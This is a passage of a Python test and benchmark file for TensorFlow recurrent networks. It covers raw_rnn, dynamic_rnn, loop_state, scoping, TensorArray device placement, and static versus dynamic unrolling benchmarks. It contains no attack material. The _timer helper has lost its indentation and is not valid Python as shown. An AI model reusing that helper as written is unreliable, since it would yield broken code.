      inputs_ta = inputs_ta.unpack(inputs)
      cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)

      def loop_fn(time_, cell_output, cell_state, unused_loop_state):
        # raw_rnn calls loop_fn once with cell_output=None before step 0.
        emit_output = cell_output  # == None for time == 0
        if cell_output is None:  # time == 0
          next_state = cell.zero_state(batch_size, tf.float32)
        else:
          next_state = cell_state  # copy state through
        elements_finished = (time_ >= sequence_length)
        finished = tf.reduce_all(elements_finished)
        # For the very final iteration, we must emit a dummy input
        next_input = tf.cond(
            finished,
            lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
            lambda: inputs_ta.read(time_))
        return (elements_finished, next_input, next_state, emit_output, None)

      reuse_scope = tf.get_variable_scope()
      outputs_ta, final_state, _ = tf.nn.raw_rnn(
          cell, loop_fn, scope=reuse_scope)
      outputs = outputs_ta.pack()
      # Reuse the same variables so dynamic_rnn is numerically comparable.
      reuse_scope.reuse_variables()
      outputs_dynamic_rnn, final_state_dynamic_rnn = tf.nn.dynamic_rnn(
          cell, inputs, time_major=True, dtype=tf.float32,
          sequence_length=sequence_length, scope=reuse_scope)
      variables = tf.trainable_variables()
      gradients = tf.gradients([outputs, final_state], [inputs] + variables)
      gradients_dynamic_rnn = tf.gradients(
          [outputs_dynamic_rnn, final_state_dynamic_rnn], [inputs] + variables)
      tf.global_variables_initializer().run()
      rand_input = np.random.randn(max_time, batch_size, input_depth)
      if max_time == 0:
        rand_seq_len = np.zeros(batch_size)
      else:
        rand_seq_len = np.random.randint(max_time, size=batch_size)
        # To ensure same output lengths for dynamic_rnn and raw_rnn
        rand_seq_len[0] = max_time
      (outputs_val, outputs_dynamic_rnn_val,
       final_state_val, final_state_dynamic_rnn_val) = sess.run(
           [outputs, outputs_dynamic_rnn, final_state, final_state_dynamic_rnn],
           feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
      self.assertAllClose(outputs_dynamic_rnn_val, outputs_val)
      self.assertAllClose(final_state_dynamic_rnn_val, final_state_val)
      # NOTE: Because with 0 time steps, raw_rnn does not have shape
      # information about the input, it is impossible to perform
      # gradients comparisons as the gradients eval will fail. So
      # this case skips the gradients test.
      if max_time > 0:
        self.assertEqual(len(gradients), len(gradients_dynamic_rnn))
        gradients_val = sess.run(
            gradients,
            feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
        gradients_dynamic_rnn_val = sess.run(
            gradients_dynamic_rnn,
            feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
        self.assertEqual(len(gradients_val), len(gradients_dynamic_rnn_val))
        input_gradients_val = gradients_val[0]
        input_gradients_dynamic_rnn_val = gradients_dynamic_rnn_val[0]
        self.assertAllClose(
            input_gradients_val, input_gradients_dynamic_rnn_val)
        for i in range(1, len(gradients_val)):
          self.assertAllClose(gradients_dynamic_rnn_val[i], gradients_val[i])

  def testRawRNNZeroLength(self):
    # NOTE: Because with 0 time steps, raw_rnn does not have shape
    # information about the input, it is impossible to perform
    # gradients comparisons as the gradients eval will fail. So this
    # case skips the gradients test.
    self._testRawRNN(max_time=0)

  def testRawRNN(self):
    self._testRawRNN(max_time=10)

  def testLoopState(self):
    """loop_state can thread a scalar counter through every time step."""
    with self.test_session(graph=tf.Graph()):
      max_time = 10
      batch_size = 16
      input_depth = 4
      num_units = 3
      inputs = np.random.randn(max_time, batch_size, input_depth)
      inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
      inputs_ta = inputs_ta.unpack(inputs)
      cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)

      def loop_fn(time_, cell_output, cell_state, loop_state):
        if cell_output is None:
          # First call: initialize the counter and the cell state.
          loop_state = tf.constant([0])
          next_state = cell.zero_state(batch_size, tf.float32)
        else:
          # Subsequent calls: increment the counter.
          loop_state = tf.stack([tf.squeeze(loop_state) + 1])
          next_state = cell_state
        emit_output = cell_output  # == None for time == 0
        elements_finished = tf.tile([time_ >= max_time], [batch_size])
        finished = tf.reduce_all(elements_finished)
        # For the very final iteration, we must emit a dummy input
        next_input = tf.cond(
            finished,
            lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
            lambda: inputs_ta.read(time_))
        return (elements_finished, next_input,
                next_state, emit_output, loop_state)

      r = tf.nn.raw_rnn(cell, loop_fn)
      loop_state = r[-1]
      # Counter incremented once per step: 10 steps -> [10].
      self.assertEqual([10], loop_state.eval())

  def testLoopStateWithTensorArray(self):
    """loop_state may itself be a TensorArray accumulated across steps."""
    with self.test_session(graph=tf.Graph()):
      max_time = 4
      batch_size = 16
      input_depth = 4
      num_units = 3
      inputs = np.random.randn(max_time, batch_size, input_depth)
      inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
      inputs_ta = inputs_ta.unpack(inputs)
      cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)

      def loop_fn(time_, cell_output, cell_state, loop_state):
        if cell_output is None:
          # clear_after_read=False so each element can be re-read below.
          loop_state = tf.TensorArray(
              dynamic_size=True, size=0, dtype=tf.int32, clear_after_read=False)
          loop_state = loop_state.write(0, 1)
          next_state = cell.zero_state(batch_size, tf.float32)
        else:
          # Running sum: state[t] = state[t-1] + t.
          loop_state = loop_state.write(
              time_, loop_state.read(time_ - 1) + time_)
          next_state = cell_state
        emit_output = cell_output  # == None for time == 0
        elements_finished = tf.tile([time_ >= max_time], [batch_size])
        finished = tf.reduce_all(elements_finished)
        # For the very final iteration, we must emit a dummy input
        next_input = tf.cond(
            finished,
            lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
            lambda: inputs_ta.read(time_))
        return (elements_finished, next_input,
                next_state, emit_output, loop_state)

      r = tf.nn.raw_rnn(cell, loop_fn)
      loop_state = r[-1]
      loop_state = loop_state.pack()
      self.assertAllEqual([1, 2, 2 + 2, 4 + 3, 7 + 4], loop_state.eval())

  def testEmitDifferentStructureThanCellOutput(self):
    """loop_fn's emitted structure need not match the cell's own output."""
    with self.test_session(graph=tf.Graph()) as sess:
      max_time = 10
      batch_size = 16
      input_depth = 4
      num_units = 3
      inputs = np.random.randn(max_time, batch_size, input_depth)
      inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
      inputs_ta = inputs_ta.unpack(inputs)
      cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)

      def loop_fn(time_, cell_output, cell_state, _):
        if cell_output is None:
          # First call defines the per-step emit structure (shapes exclude
          # the batch dimension) rather than echoing the cell output.
          emit_output = (tf.zeros([2, 3], dtype=tf.int32),
                         tf.zeros([1], dtype=tf.int64))
          next_state = cell.zero_state(batch_size, tf.float32)
        else:
          emit_output = (tf.ones([batch_size, 2, 3], dtype=tf.int32),
                         tf.ones([batch_size, 1], dtype=tf.int64))
          next_state = cell_state
        elements_finished = tf.tile([time_ >= max_time], [batch_size])
        finished = tf.reduce_all(elements_finished)
        # For the very final iteration, we must emit a dummy input
        next_input = tf.cond(
            finished,
            lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
            lambda: inputs_ta.read(time_))
        return (elements_finished, next_input, next_state, emit_output, None)

      r = tf.nn.raw_rnn(cell, loop_fn)
      output_ta = r[0]
      self.assertEqual(2, len(output_ta))
      self.assertEqual([tf.int32, tf.int64], [ta.dtype for ta in output_ta])
      output = [ta.pack() for ta in output_ta]
      output_vals = sess.run(output)
      self.assertAllEqual(
          np.ones((max_time, batch_size, 2, 3), np.int32), output_vals[0])
      self.assertAllEqual(
          np.ones((max_time, batch_size, 1), np.int64), output_vals[1])

  def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
    """Builds a graph via `factory` and checks all variables are scoped."""
    with self.test_session(use_gpu=True, graph=tf.Graph()):
      if use_outer_scope:
        with tf.variable_scope(prefix) as scope:
          factory(scope)
      else:
        factory(prefix)
      tf.global_variables_initializer()
      # check that all the variables names starts
      # with the proper scope.
      all_vars = tf.global_variables()
      # None means the library default scope name is used.
      prefix = prefix or "rnn"
      scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
      tf.logging.info("RNN with scope: %s (%s)"
                      % (prefix, "scope" if use_outer_scope else "str"))
      for v in scope_vars:
        tf.logging.info(v.name)
      # Every variable must live under the prefix.
      self.assertEqual(len(scope_vars), len(all_vars))

  def testRawRNNScope(self):
    """raw_rnn scoping works for scope objects, strings, and the default."""
    max_time = 10
    batch_size = 16
    input_depth = 4
    num_units = 3

    def factory(scope):
      inputs = tf.placeholder(shape=(max_time, batch_size, input_depth),
                              dtype=tf.float32)
      sequence_length = tf.placeholder(shape=(batch_size,), dtype=tf.int32)
      inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
      inputs_ta = inputs_ta.unpack(inputs)
      cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)

      def loop_fn(time_, cell_output, cell_state, unused_loop_state):
        emit_output = cell_output  # == None for time == 0
        if cell_output is None:  # time == 0
          next_state = cell.zero_state(batch_size, tf.float32)
        else:
          next_state = cell_state
        elements_finished = (time_ >= sequence_length)
        finished = tf.reduce_all(elements_finished)
        # For the very final iteration, we must emit a dummy input
        next_input = tf.cond(
            finished,
            lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
            lambda: inputs_ta.read(time_))
        return (elements_finished, next_input, next_state, emit_output, None)

      return tf.nn.raw_rnn(cell, loop_fn, scope=scope)

    self._testScope(factory, use_outer_scope=True)
    self._testScope(factory, use_outer_scope=False)
    self._testScope(factory, prefix=None, use_outer_scope=False)
class DeviceWrapperCell(tf.contrib.rnn.RNNCell):
  """Class to ensure cell calculation happens on a specific device."""

  def __init__(self, cell, device):
    """Wraps `cell`; `device` may be None to leave placement untouched."""
    self._cell = cell
    self._device = device

  @property
  def output_size(self):
    # Delegate straight to the wrapped cell.
    return self._cell.output_size

  @property
  def state_size(self):
    # Delegate straight to the wrapped cell.
    return self._cell.state_size

  def __call__(self, input_, state, scope=None):
    # Guard clause: with no explicit device, defer to default placement.
    if self._device is None:
      return self._cell(input_, state, scope)
    with tf.device(self._device):
      return self._cell(input_, state, scope)
class TensorArrayOnCorrectDeviceTest(tf.test.TestCase):
  """Verifies dynamic_rnn's internal TensorArray ops land on the right device."""

  def _execute_rnn_on(
      self, rnn_device=None, cell_device=None, input_device=None):
    """Runs dynamic_rnn with the given device pins; returns run metadata.

    Any of the device arguments may be None, meaning "no explicit pin".
    The returned RunMetadata carries full-trace step stats that the test
    methods below inspect for TensorArray op placement.
    """
    batch_size = 3
    time_steps = 7
    input_size = 5
    num_units = 10
    cell = tf.contrib.rnn.LSTMCell(num_units, use_peepholes=True)
    # Wrap the cell so its computation is pinned to cell_device (if any).
    gpu_cell = DeviceWrapperCell(cell, cell_device)
    inputs = np.random.randn(batch_size, time_steps, input_size).astype(
        np.float32)
    sequence_length = np.random.randint(0, time_steps, size=batch_size)
    if input_device is not None:
      with tf.device(input_device):
        inputs = tf.constant(inputs)
    if rnn_device is not None:
      with tf.device(rnn_device):
        outputs, _ = tf.nn.dynamic_rnn(
            gpu_cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
    else:
      outputs, _ = tf.nn.dynamic_rnn(
          gpu_cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
    with self.test_session(use_gpu=True) as sess:
      # Full trace so per-device node stats are recorded.
      opts = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
      run_metadata = tf.RunMetadata()
      tf.global_variables_initializer().run()
      sess.run(outputs, options=opts, run_metadata=run_metadata)
    return run_metadata

  def testRNNOnCPUCellOnGPU(self):
    """RNN loop on CPU, cell on GPU: writes/gathers GPU, reads/scatters CPU."""
    if not tf.test.is_gpu_available():
      return  # Test requires access to a GPU
    run_metadata = self._execute_rnn_on(
        rnn_device="/cpu:0", cell_device="/gpu:0")
    step_stats = run_metadata.step_stats
    # dev_stats ordering is not fixed; locate the GPU entry by name.
    ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
    gpu_stats = step_stats.dev_stats[ix].node_stats
    cpu_stats = step_stats.dev_stats[1 - ix].node_stats

    def _assert_in(op_str, in_stats, out_stats):
      # Op must appear in in_stats and be absent from out_stats.
      self.assertTrue(any(op_str in s.node_name for s in in_stats))
      self.assertFalse(any(op_str in s.node_name for s in out_stats))
    # Writes happen at output of RNN cell
    _assert_in("TensorArrayWrite", gpu_stats, cpu_stats)
    # Gather happens on final TensorArray
    _assert_in("TensorArrayGather", gpu_stats, cpu_stats)
    # Reads happen at input to RNN cell
    _assert_in("TensorArrayRead", cpu_stats, gpu_stats)
    # Scatters happen to get initial input into TensorArray
    _assert_in("TensorArrayScatter", cpu_stats, gpu_stats)

  def testRNNOnCPUCellOnCPU(self):
    """RNN loop and cell both on CPU: all TensorArray ops stay on CPU."""
    if not tf.test.is_gpu_available():
      return  # Test requires access to a GPU
    run_metadata = self._execute_rnn_on(
        rnn_device="/cpu:0", cell_device="/cpu:0", input_device="/gpu:0")
    step_stats = run_metadata.step_stats
    ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
    gpu_stats = step_stats.dev_stats[ix].node_stats
    cpu_stats = step_stats.dev_stats[1 - ix].node_stats

    def _assert_in(op_str, in_stats, out_stats):
      self.assertTrue(any(op_str in s.node_name for s in in_stats))
      self.assertFalse(any(op_str in s.node_name for s in out_stats))
    # All TensorArray operations happen on CPU
    _assert_in("TensorArray", cpu_stats, gpu_stats)

  def testInputOnGPUCellNotDeclared(self):
    """With only the input pinned to GPU, everything colocates on GPU."""
    if not tf.test.is_gpu_available():
      return  # Test requires access to a GPU
    run_metadata = self._execute_rnn_on(input_device="/gpu:0")
    step_stats = run_metadata.step_stats
    ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
    gpu_stats = step_stats.dev_stats[ix].node_stats
    cpu_stats = step_stats.dev_stats[1 - ix].node_stats

    def _assert_in(op_str, in_stats, out_stats):
      self.assertTrue(any(op_str in s.node_name for s in in_stats))
      self.assertFalse(any(op_str in s.node_name for s in out_stats))
    # Everything happens on GPU
    _assert_in("TensorArray", gpu_stats, cpu_stats)
######### Benchmarking RNN code
def _static_vs_dynamic_rnn_benchmark_static(inputs_list_t, sequence_length):
  """Builds the static_rnn benchmark graph: forward pass plus gradients.

  Returns a single group op so one sess.run executes everything.
  """
  (_, depth) = inputs_list_t[0].get_shape().as_list()
  init = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
  lstm = tf.contrib.rnn.LSTMCell(
      num_units=depth, use_peepholes=True, initializer=init,
      state_is_tuple=False)
  outputs, final_state = tf.contrib.rnn.static_rnn(
      lstm, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
  params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
  grads = tf.gradients(outputs + [final_state], params)
  # Group forward outputs and all gradients behind one op.
  return tf.group(final_state, *(grads + outputs))
def _static_vs_dynamic_rnn_benchmark_dynamic(inputs_t, sequence_length):
  """Builds the dynamic_rnn benchmark graph: forward pass plus gradients.

  Returns a single group op so one sess.run executes everything.
  """
  (_, _, depth) = inputs_t.get_shape().as_list()
  init = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
  lstm = tf.contrib.rnn.LSTMCell(
      num_units=depth, use_peepholes=True, initializer=init,
      state_is_tuple=False)
  outputs, final_state = tf.nn.dynamic_rnn(
      lstm, inputs_t, sequence_length=sequence_length, dtype=tf.float32)
  params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
  grads = tf.gradients([outputs, final_state], params)
  # Group forward outputs and all gradients behind one op.
  return tf.group(final_state, outputs, *grads)
def graph_creation_static_vs_dynamic_rnn_benchmark(max_time):
  """Times graph *construction* (not execution) for static vs dynamic RNN.

  Prints a tab-separated row and returns (static_secs, dynamic_secs).
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # These parameters don't matter
  batch_size = 512
  num_units = 512

  # Set up sequence lengths
  np.random.seed([127])
  sequence_length = np.random.randint(0, max_time, size=batch_size)
  inputs_list = [
      np.random.randn(batch_size, num_units).astype(np.float32)
      for _ in range(max_time)]
  inputs = np.dstack(inputs_list).transpose([0, 2, 1])  # batch x time x depth

  def _build_static():
    # Fresh graph per timing sample; only construction cost is measured.
    with tf.Session(config=config, graph=tf.Graph()):
      step_tensors = [
          tf.Variable(x, trainable=False).value() for x in inputs_list]
      _static_vs_dynamic_rnn_benchmark_static(step_tensors, sequence_length)

  def _build_dynamic():
    with tf.Session(config=config, graph=tf.Graph()):
      packed = tf.Variable(inputs, trainable=False).value()
      _static_vs_dynamic_rnn_benchmark_dynamic(packed, sequence_length)

  static_secs = timeit.timeit(_build_static, number=5)
  dynamic_secs = timeit.timeit(_build_dynamic, number=5)
  print("%d \t %f \t %f \t %f" %
        (max_time, static_secs, dynamic_secs, dynamic_secs / static_secs))
  return static_secs, dynamic_secs
def _timer(sess, ops):
# Warm in
for _ in range(2):
sess.run(ops)
# Timing run
runs = 20
start = time.time()
for _ in range(runs):
sess.run(ops)
end = time.time()
return (end - start)/float(runs)
def static_vs_dynamic_rnn_benchmark(batch_size, max_time, num_units, use_gpu):
  """Benchmarks execution time of static_rnn vs dynamic_rnn.

  Prints a tab-separated row and returns (static_secs, dynamic_secs).
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # Set up sequence lengths
  np.random.seed([127])
  sequence_length = np.random.randint(0, max_time, size=batch_size)
  inputs_list = [
      np.random.randn(batch_size, num_units).astype(np.float32)
      for _ in range(max_time)]
  inputs = np.dstack(inputs_list).transpose([0, 2, 1])  # batch x time x depth

  # None lets soft placement pick the device (GPU if available).
  device = "/cpu:0" if not use_gpu else None

  # Using rnn()
  with tf.Session(config=config, graph=tf.Graph()) as sess:
    with tf.device(device):
      inputs_list_t = [
          tf.Variable(x, trainable=False).value() for x in inputs_list]
      ops = _static_vs_dynamic_rnn_benchmark_static(
          inputs_list_t, sequence_length)
    tf.global_variables_initializer().run()
    static_secs = _timer(sess, ops)

  # Using dynamic_rnn()
  with tf.Session(config=config, graph=tf.Graph()) as sess:
    with tf.device(device):
      inputs_t = tf.Variable(inputs, trainable=False).value()
      ops = _static_vs_dynamic_rnn_benchmark_dynamic(
          inputs_t, sequence_length)
    tf.global_variables_initializer().run()
    dynamic_secs = _timer(sess, ops)

  print("%d \t %d \t %d \t %s \t %f \t %f \t %f" %
        (batch_size, max_time, num_units, use_gpu, static_secs,
         dynamic_secs, dynamic_secs / static_secs))
  return static_secs, dynamic_secs
def _half_seq_len_vs_unroll_half_rnn_benchmark(inputs_list_t, sequence_length):
  """Build static_rnn forward+backward ops for the half-seq-len benchmark."""
  _, input_size = inputs_list_t[0].get_shape().as_list()
  uniform_init = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
  lstm = tf.contrib.rnn.LSTMCell(
      num_units=input_size, use_peepholes=True, initializer=uniform_init,
      state_is_tuple=False)
  outputs, final_state = tf.contrib.rnn.static_rnn(
      lstm, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
  # Taking gradients w.r.t. all trainables forces the backward pass too.
  train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
  grads = tf.gradients(outputs + [final_state], train_vars)
  return tf.group(final_state, *(grads + outputs))
def half_seq_len_vs_unroll_half_rnn_benchmark(
    batch_size, max_time, num_units, use_gpu):
  """Compare full unroll with halved sequence_length vs. halved unroll depth.

  Prints a summary row and returns (delta_half_seq_len, delta_unroll_half)
  in seconds per run.
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # Deterministic inputs; all sequences nominally run the full max_time.
  np.random.seed([127])
  sequence_length = max_time * np.ones((batch_size,))
  inputs_list = [np.random.randn(batch_size, num_units).astype(np.float32)
                 for _ in range(max_time)]

  device = "/cpu:0" if not use_gpu else None

  # Variant 1: full static unroll, sequence_length halved.
  with tf.Session(config=config, graph=tf.Graph()) as session:
    with tf.device(device):
      full_inputs = [tf.Variable(x, trainable=False).value()
                     for x in inputs_list]
      ops = _half_seq_len_vs_unroll_half_rnn_benchmark(
          full_inputs, sequence_length / 2)
    tf.global_variables_initializer().run()
    delta_half_seq_len = _timer(session, ops)

  # Variant 2: unroll only half the steps (no reliance on sequence_length).
  with tf.Session(config=config, graph=tf.Graph()) as session:
    with tf.device(device):
      half_inputs = [tf.Variable(x, trainable=False).value()
                     for x in inputs_list]
      ops = _half_seq_len_vs_unroll_half_rnn_benchmark(
          half_inputs[:(max_time // 2)], sequence_length / 2)
    tf.global_variables_initializer().run()
    delta_unroll_half = _timer(session, ops)

  print("%d \t %d \t\t %d \t %s \t %f \t\t %f \t\t %f" %
        (batch_size, max_time, num_units, use_gpu, delta_half_seq_len,
         delta_unroll_half, delta_half_seq_len/delta_unroll_half))
  return delta_half_seq_len, delta_unroll_half
def _concat_state_vs_tuple_state_rnn_benchmark(
    inputs_list_t, sequence_length, state_is_tuple):
  """Build static_rnn fwd+bwd ops with concatenated or tuple LSTM state."""
  _, input_size = inputs_list_t[0].get_shape().as_list()
  uniform_init = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
  lstm = tf.contrib.rnn.LSTMCell(
      num_units=input_size, use_peepholes=True,
      initializer=uniform_init, state_is_tuple=state_is_tuple)
  outputs, final_state = tf.contrib.rnn.static_rnn(
      lstm, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
  # Normalize the state to a list so both variants group identically.
  final_state = list(final_state) if state_is_tuple else [final_state]
  train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
  grads = tf.gradients(outputs + final_state, train_vars)
  return tf.group(*(final_state + grads + outputs))
def concat_state_vs_tuple_state_rnn_benchmark(
    batch_size, max_time, num_units, use_gpu):
  """Time static_rnn with concatenated vs. tuple LSTM state.

  Prints a summary row and returns (delta_concat_state, delta_tuple_state)
  in seconds per run.
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # Deterministic inputs; every sequence runs the full max_time.
  np.random.seed([127])
  sequence_length = max_time * np.ones((batch_size,))
  inputs_list = [np.random.randn(batch_size, num_units).astype(np.float32)
                 for _ in range(max_time)]

  device = "/cpu:0" if not use_gpu else None

  # Concatenated cell/hidden state (legacy default).
  with tf.Session(config=config, graph=tf.Graph()) as session:
    with tf.device(device):
      concat_inputs = [tf.Variable(x, trainable=False).value()
                       for x in inputs_list]
      ops = _concat_state_vs_tuple_state_rnn_benchmark(
          concat_inputs, sequence_length, state_is_tuple=False)
    tf.global_variables_initializer().run()
    delta_concat_state = _timer(session, ops)

  # Tuple (c, h) state.
  with tf.Session(config=config, graph=tf.Graph()) as session:
    with tf.device(device):
      tuple_inputs = [tf.Variable(x, trainable=False).value()
                      for x in inputs_list]
      ops = _concat_state_vs_tuple_state_rnn_benchmark(
          tuple_inputs, sequence_length, state_is_tuple=True)
    tf.global_variables_initializer().run()
    delta_tuple_state = _timer(session, ops)

  print("%d \t %d \t %d \t %s \t %f \t\t %f \t\t %f" %
        (batch_size, max_time, num_units, use_gpu, delta_concat_state,
         delta_tuple_state, delta_concat_state/delta_tuple_state))
  return delta_concat_state, delta_tuple_state
def _dynamic_rnn_swap_memory_benchmark(inputs_t, sequence_length,
                                       swap_memory):
  """Build dynamic_rnn fwd+bwd ops, optionally swapping activations to host."""
  _, _, input_size = inputs_t.get_shape().as_list()
  uniform_init = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
  lstm = tf.contrib.rnn.LSTMCell(
      num_units=input_size, use_peepholes=True, initializer=uniform_init,
      state_is_tuple=False)
  outputs, final_state = tf.nn.dynamic_rnn(
      lstm, inputs_t, sequence_length=sequence_length,
      swap_memory=swap_memory, dtype=tf.float32)
  # Gradients w.r.t. all trainables force the backward pass as well.
  train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
  grads = tf.gradients([outputs, final_state], train_vars)
  return tf.group(final_state, outputs, *grads)
def dynamic_rnn_swap_memory_benchmark(batch_size, max_time, num_units):
  """Time dynamic_rnn with and without swap_memory.

  Prints a summary row and returns (no_swap, swap) in seconds per run.
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # Deterministic random sequence lengths and inputs.
  np.random.seed([127])
  sequence_length = np.random.randint(0, max_time, size=batch_size)
  inputs_list = [np.random.randn(batch_size, num_units).astype(np.float32)
                 for _ in range(max_time)]
  inputs = np.dstack(inputs_list).transpose([0, 2, 1])  # batch x time x depth

  def _run_once(swap_memory):
    # A fresh graph/session per configuration keeps the timings independent.
    with tf.Session(config=config, graph=tf.Graph()) as session:
      inputs_t = tf.Variable(inputs, trainable=False).value()
      ops = _dynamic_rnn_swap_memory_benchmark(
          inputs_t, sequence_length, swap_memory=swap_memory)
      tf.global_variables_initializer().run()
      return _timer(session, ops)

  no_swap = _run_once(False)
  swap = _run_once(True)

  print("%d \t %d \t %d \t %f \t %f \t %f" %
        (batch_size, max_time, num_units, no_swap, swap, swap/no_swap))
  return no_swap, swap
def rnn_long_sequence_benchmark(batch_size, seqlen, num_units,
                                dynamic, swap_memory):
  """Benchmark a long-sequence LSTM, static or dynamic, over five repeats.

  Prints one summary row per repeat; returns nothing.
  """
  config = tf.ConfigProto()
  config.allow_soft_placement = True

  # Deterministic inputs; every sequence runs the full seqlen.
  np.random.seed([127])
  sequence_length = [seqlen for _ in range(batch_size)]
  inputs_list = [np.random.randn(batch_size, num_units).astype(np.float32)
                 for _ in range(seqlen)]
  inputs = np.dstack(inputs_list).transpose([0, 2, 1])  # batch x time x depth

  for _ in range(5):
    if dynamic:
      with tf.Session(config=config, graph=tf.Graph()) as session:
        inputs_t = tf.Variable(inputs, trainable=False).value()
        ops = _dynamic_rnn_swap_memory_benchmark(
            inputs_t, sequence_length, swap_memory=swap_memory)
        tf.global_variables_initializer().run()
        elapsed = _timer(session, ops)
    else:
      with tf.Session(config=config, graph=tf.Graph()) as session:
        static_inputs = [tf.Variable(x, trainable=False).value()
                         for x in inputs_list]
        ops = _static_vs_dynamic_rnn_benchmark_static(
            static_inputs, sequence_length)
        tf.global_variables_initializer().run()
        elapsed = _timer(session, ops)

    print("%d \t %d \t %d \t %s \t %f \t %f" %
          (batch_size, seqlen, num_units, dynamic, elapsed,
           elapsed/seqlen))
class BenchmarkRNN(tf.test.Benchmark):
  """Benchmark suite comparing RNN construction and execution strategies."""

  def benchmarkGraphCreationStaticVsDynamicLSTM(self):
    """Graph-construction time: static unroll vs. dynamic unroll."""
    print("Graph Creation: Static Unroll vs. Dynamic Unroll LSTM")
    print("max_t \t dt(static) \t dt(dynamic) \t dt(dynamic)/dt(static)")
    for max_time in (1, 25, 50):
      dt_static, dt_dynamic = graph_creation_static_vs_dynamic_rnn_benchmark(
          max_time)
      self.report_benchmark(
          name="graph_creation_time_static_T%02d" % max_time,
          iters=5, wall_time=dt_static)
      self.report_benchmark(
          name="graph_creation_time_dynamic_T%02d" % max_time,
          iters=5, wall_time=dt_dynamic)

  def benchmarkStaticUnrollVsDynamicFlowLSTM(self):
    """Execution time: static unroll vs. dynamic_rnn."""
    print("Calculation: Static Unroll with Dynamic Flow LSTM "
          "vs. Dynamic Unroll LSTM")
    print("batch \t max_t \t units \t gpu \t dt(static) \t dt(dynamic) "
          "\t dt(dynamic)/dt(static)")
    for batch_size in (256,):
      for max_time in (50,):
        for num_units in (512, 256, 128):
          for use_gpu in (False, True):
            dt_static, dt_dynamic = static_vs_dynamic_rnn_benchmark(
                batch_size, max_time, num_units, use_gpu)
            self.report_benchmark(
                name="static_unroll_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_static)
            self.report_benchmark(
                name="dynamic_unroll_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_dynamic)

  def benchmarkDynamicLSTMNoMemorySwapVsMemorySwap(self):
    """Execution time: dynamic_rnn without vs. with host-memory swapping."""
    print("Calculation: Dynamic LSTM No Memory Swap vs. Memory Swap")
    print("batch \t max_t \t units \t no_swap \t swap \t swap/no_swap")
    for batch_size in (256, 512):
      for max_time in (100,):
        for num_units in (512, 256, 128):
          dt_no_swap, dt_swap = dynamic_rnn_swap_memory_benchmark(
              batch_size, max_time, num_units)
          self.report_benchmark(
              name="dynamic_lstm_no_memory_swap_T%02d_B%03d_N%03d"
              % (max_time, batch_size, num_units),
              iters=20, wall_time=dt_no_swap)
          self.report_benchmark(
              name="dynamic_lstm_with_memory_swap_T%02d_B%03d_N%03d"
              % (max_time, batch_size, num_units),
              iters=20, wall_time=dt_swap)

  def benchmarkStaticUnrollHalfSequenceLengthVsHalfUnroll(self):
    """Execution time: halved sequence_length vs. halved unroll depth."""
    print("Calculation: Static Unroll with Halved Sequence Length "
          "vs. Half Static Unroll")
    print("batch \t full_t \t units \t gpu \t dt(half_seq_len) "
          "\t dt(unroll_half) \t dt(half_seq_len)/dt(unroll_half)")
    for batch_size in (128,):
      for max_time in (50,):
        for num_units in (256,):
          for use_gpu in (False, True):
            dt_half_seq, dt_half_unroll = half_seq_len_vs_unroll_half_rnn_benchmark(
                batch_size, max_time, num_units, use_gpu)
            self.report_benchmark(
                name="half_seq_len_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_half_seq)
            self.report_benchmark(
                name="unroll_half_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_half_unroll)

  def benchmarkStaticUnrollStateConcatVsStateTuple(self):
    """Execution time: concatenated LSTM state vs. tuple state."""
    print("Calculation: Static Unroll with Concatenated State "
          "vs. Tuple State")
    print("batch \t time \t units \t gpu \t dt(concat_state) "
